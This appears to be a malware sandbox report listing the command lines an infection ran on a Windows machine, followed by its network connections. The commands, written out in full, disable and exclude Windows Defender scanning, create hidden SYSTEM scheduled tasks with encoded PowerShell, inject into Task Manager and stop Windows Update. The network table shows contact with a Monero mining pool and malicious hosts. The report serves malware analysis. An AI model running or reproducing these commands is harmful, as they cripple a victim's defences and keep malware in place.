"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gpAgAQhTC" /SC once /ST 03:39:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gpAgAQhTC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gpAgAQhTC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 01:45:00 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe\" KS /Rbsite_idJrX 385119 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe KS /Rbsite_idJrX 385119 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\juieFp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\ooIpBXG.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ztlTbPYifermRZH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ztlTbPYifermRZH"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\wfvKKmV.xml" /RU "SYSTEM"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\KnmoPiu.xml" /RU "SYSTEM"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\XrdPiqO.xml" /RU "SYSTEM"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\vtqvHoN.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "HKFMMLmWpeGdwIqGl" /SC once /ST 00:10:39 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\BmlcjtQg\aRJfuaY.dll\",#1 /vXsite_idfWf 385119" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "HKFMMLmWpeGdwIqGl"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

\??\c:\windows\system32\rundll32.EXE

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\BmlcjtQg\aRJfuaY.dll",#1 /vXsite_idfWf 385119

C:\Windows\SysWOW64\rundll32.exe

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\BmlcjtQg\aRJfuaY.dll",#1 /vXsite_idfWf 385119

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "GyWbuVQzPmDmgkCMH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "HKFMMLmWpeGdwIqGl"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
TR 185.216.70.222:80 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 96.134.101.95.in-addr.arpa udp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 45.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
NL 157.240.201.35:443 facebook.com tcp
NL 157.240.201.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
NL 157.240.201.35:443 fbcdn.net tcp
NL 157.240.201.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
NL 157.240.201.35:443 fbsbx.com tcp
NL 157.240.201.35:443 fbsbx.com tcp
US 8.8.8.8:53 15.201.240.157.in-addr.arpa udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 20.189.173.22:443 watson.telemetry.microsoft.com tcp
US 8.8.8.8:53 22.173.189.20.in-addr.arpa udp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
US 20.189.173.22:443 watson.telemetry.microsoft.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 20.189.173.22:443 watson.telemetry.microsoft.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 93.229.161.81.in-addr.arpa udp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 204.79.197.200:443 www.bing.com tcp
US 204.79.197.200:443 www.bing.com tcp
US 8.8.8.8:53 59.82.57.23.in-addr.arpa udp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
NL 194.169.175.235:42691 tcp
US 8.8.8.8:53 235.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.34:80 host-host-file8.com tcp
US 8.8.8.8:53 34.26.214.95.in-addr.arpa udp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp
NL 157.240.201.35:443 fbsbx.com tcp
NL 157.240.201.35:443 fbsbx.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 7778aa9e-d80d-45fa-af7c-13824a63c23a.uuid.allstatsin.ru udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 176.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 datasheet.fun udp
US 8.8.8.8:53 clients2.google.com udp
NL 172.217.168.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
NL 142.251.36.1:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 170.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 238.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
DE 51.68.190.80:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 80.190.68.51.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
FR 51.255.34.118:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 stun.stunprotocol.org udp
US 8.8.8.8:53 server1.allstatsin.ru udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
BG 185.82.216.104:443 server1.allstatsin.ru tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 118.34.255.51.in-addr.arpa udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 104.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.97.0:443 walkinglate.com tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 api4.check-data.xyz udp
US 35.81.204.150:80 api4.check-data.xyz tcp
US 8.8.8.8:53 150.204.81.35.in-addr.arpa udp
BG 185.82.216.104:443 server1.allstatsin.ru tcp
